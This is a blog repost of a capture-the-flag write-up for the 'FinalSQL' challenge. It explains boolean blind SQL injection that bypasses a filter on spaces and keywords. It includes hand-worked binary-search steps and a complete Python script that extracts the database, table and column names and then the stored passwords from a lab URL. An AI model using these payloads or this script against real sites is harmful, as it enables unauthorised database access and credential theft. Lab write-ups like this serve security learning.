zoukankan      html  css  js  c++  java
  • [极客大挑战 2019]FinalSQL

    考点

    SQL盲注
    bypass空格

    题解

    题目提示SQL盲注,过滤了很多关键词

    if mid like limit union and | & *  /**/ 空格
    

    输入 id=1^0 返回正确
    语句如下:
    0^(ascii(substr((select(database())),1,1))>102)
    ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))>mid
    若SQL语句为真则返回正常,为假则返回ERROR

    select(group_concat(schema_name))from(information_schema.schemata)

    二分法

    假设第一个字符的ASCII码为96
    
    low  high  mid
    32   126   81
    返回正常则为真,第一个字符的ASCII码大于81
    82   126   104
    返回ERROR则为假,第一个字符的ASCII码小于等于104
    82   104   93
    返回正常则为真,第一个字符的ASCII码大于93
    94   104   99
    返回ERROR则为假,第一个字符的ASCII码小于等于99
    94   99    96
    返回ERROR则为假,第一个字符的ASCII码小于等于96
    94   96    95
    返回正常则为真,第一个字符的ASCII码大于95
    96   96
    

    脚本如下

    import requests
    
    url = 'http://5d9d1cb2-97fb-46b6-87e2-0fd16174256b.node3.buuoj.cn/search.php?id=' 
    
    # geek
    def get_database():
        flag = ''
        for i in range(1, 50):
            low = 32
            high = 126
            mid = (low+high)//2
            print(flag)
            while low < high:
                payload = f"0^(ascii(substr((select(database())),{i},1))>{mid})"
                url_t = url + payload
                r = requests.get(url=url_t)
                
                if 'ERROR' in r.text:
                    high = mid
                if 'Click others' in r.text:
                    low = mid + 1
                mid = (low+high)//2
                
                if low == high:
                    flag = flag + chr(low)
                    break
    
    # F1naI1y,Flaaaaag
    def get_table():
        flag = ''
        for i in range(1, 500):
            low = 32
            high = 126
            mid = (low+high)//2
            print(flag)
            while low < high:
                payload = f"0^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),{i},1))>{mid})"
    
                url_t = url + payload
                r = requests.get(url=url_t)
                
                if 'ERROR' in r.text:
                    high = mid
                if 'Click others' in r.text:
                    low = mid + 1
                mid = (low+high)//2
                
                if low == high:
                    flag = flag + chr(low)
                    break
    # F1naI1y: id,username,password
    # Flaaaaag: id,fl4gawsl
    def get_column():
        flag = ''
        for i in range(1, 500):
            low = 32
            high = 126
            mid = (low+high)//2
            print(flag)
            while low < high:
                payload = f"0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),{i},1))>{mid})"
    
                url_t = url + payload
                r = requests.get(url=url_t)
                
                if 'ERROR' in r.text:
                    high = mid
                if 'Click others' in r.text:
                    low = mid + 1
                mid = (low+high)//2
                
                if low == high:
                    flag = flag + chr(low)
                    break
    
    def get_flag():
        flag = ''
        for i in range(1, 500):
            low = 32
            high = 126
            mid = (low+high)//2
            print(flag)
            while low < high:
                # payload = f"0^(ascii(substr((select(group_concat(fl4gawsl))from(Flaaaaag)),{i},1))>{mid})"
                # payload = f"0^(ascii(substr((select(group_concat(password))from(F1naI1y)),{i},1))>{mid})"
                payload = f"0^(ascii(substr(reverse((select(group_concat(password))from(F1naI1y))),{i},1))>{mid})"
                url_t = url + payload
                r = requests.get(url=url_t)
                
                if 'ERROR' in r.text:
                    high = mid
                if 'Click others' in r.text:
                    low = mid + 1
                mid = (low+high)//2
                
                if low == high:
                    flag = flag + chr(low)
                    break
    get_flag()
    
  • 相关阅读:
    Inno Setup打包程序添加hosts解析
    elasticsearch安装教程
    初级模拟电路:10-2 分贝与伯德图
    初级模拟电路:10-1 对数图与分贝
    初级模拟电路:9-4 运放的数据规格书(v2)
    初级模拟电路:9-4 运放的数据规格书
    初级模拟电路:9-3 运放的其他参数
    重新部署Azure虚拟机
    Linux-NFS(网络文件系统)服务开启
    STM32_使用DAC双通道同时输出对齐的三角波和方波
  • 原文地址:https://www.cnblogs.com/peri0d/p/14077310.html
Copyright © 2011-2022 走看看